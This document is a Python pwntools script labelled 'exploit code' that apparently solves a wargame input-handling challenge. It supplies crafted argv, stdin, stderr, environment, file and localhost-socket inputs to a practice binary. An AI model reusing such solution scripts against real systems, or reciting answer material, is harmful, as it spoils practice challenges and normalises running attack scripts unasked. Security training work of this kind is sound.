exploit code

# -*- coding: utf-8 -*-
from pwn import *

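# TCP port, kept as a string because stage1() places it verbatim in argv[67];
# stage5() converts it with int() before connecting. A module-level `global`
# statement has no effect, so it is not needed here.
port = "8080"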

def stage1():
	"""Build the argument vector used to launch /home/input2/input.

	The list has 100 entries: the program path followed by the decimal
	strings "0".."98" as filler. Three slots are then overwritten; their
	indices 65, 66 and 67 equal ord('A'), ord('B') and ord('C').

	Returns:
		The argv list, with the module-level ``port`` string at index 67
		(the same port stage5() later connects to).
	"""
	argv = ['/home/input2/input'] + [str(n) for n in range(99)]
	# Replace the three consecutive slots in one slice assignment.
	argv[65:68] = ["\x00", "\x20\x0a\x0d", port] #stage5
	return argv

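def stage2():
	"""Write the stderr payload to disk and return it opened for reading.

	The four bytes 00 0A 02 FF are written to a file named ``stderr`` in the
	current working directory, so the script has to be run from a writable
	directory. main() passes the returned handle as the ``stderr=`` argument
	of process().

	Returns:
		An open binary file object positioned at the start of the payload.
		The caller is responsible for closing it.
	"""
	# Binary mode and a bytes literal keep the payload byte-exact; a text-mode
	# handle would re-encode \xff on interpreters where str is Unicode.
	with open("stderr", "wb") as out:
		out.write(b"\x00\x0a\x02\xff")
	return open("stderr", "rb")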

def stage3():
	"""Return the environment mapping handed to process() by main().

	The mapping contains exactly one variable: its name is the four
	characters \\xde\\xad\\xbe\\xef and its value is \\xca\\xfe\\xba\\xbe.
	A new dict is created on every call.
	"""
	name = '\xde\xad\xbe\xef'
	value = '\xca\xfe\xba\xbe'
	return {name: value}

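def stage4():
	"""Create the file whose name is a single newline character.

	The file is created in the current working directory and receives four
	NUL bytes. Nothing is returned; presumably the target opens the file by
	the same relative name, so it must share this working directory
	(TODO confirm against the target).
	"""
	# `with` closes the handle even if the write fails; binary mode keeps
	# the four bytes exactly as written.
	with open("\x0a", "wb") as out:
		out.write(b"\x00\x00\x00\x00")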
	
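def stage5():
	"""Connect to localhost on the configured port and send the 4-byte token.

	The port is the module-level ``port`` string, the same value stage1()
	puts in argv[67]. sendline() appends a newline after the four bytes
	DE AD BE EF.
	"""
	conn = remote("localhost", int(port))
	try:
		conn.sendline(b"\xde\xad\xbe\xef")
	finally:
		# Release the socket even when the send raises.
		conn.close()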

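def main():
	"""Launch the target and feed it each stage's input in order.

	The target is started with the argv from stage1(), the environment from
	stage3() and the file from stage2() as its stderr. The stdin payload is
	then sent, stage4() creates the newline-named file, stage5() makes the
	TCP connection, and the session is handed to the terminal. The order of
	the calls is unchanged from the original script; stage2() and stage4()
	create files in the current working directory.
	"""
	err = stage2()
	try:
		p = process(stage1(), env=stage3(), stderr=err)
		try:
			# Parenthesised print behaves the same for a single value on
			# Python 2 and is also valid on Python 3.
			print(p.recv(1024))
			p.sendline(b"\x00\x0a\x00\xff") # stage2
			# NOTE(review): '' is passed as recvline's first positional
			# argument; confirm what a falsy value means there for the
			# installed pwntools version.
			print(p.recvline(''))
			stage4()
			print(p.recv(1024))
			stage5()
			p.interactive()
		finally:
			# Close the process tube even if a stage raises.
			p.close()
	finally:
		# The stderr file handle was previously never closed.
		err.close()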

# Run the stages only when this file is executed as a script, not on import.
if __name__ == "__main__":
	main()

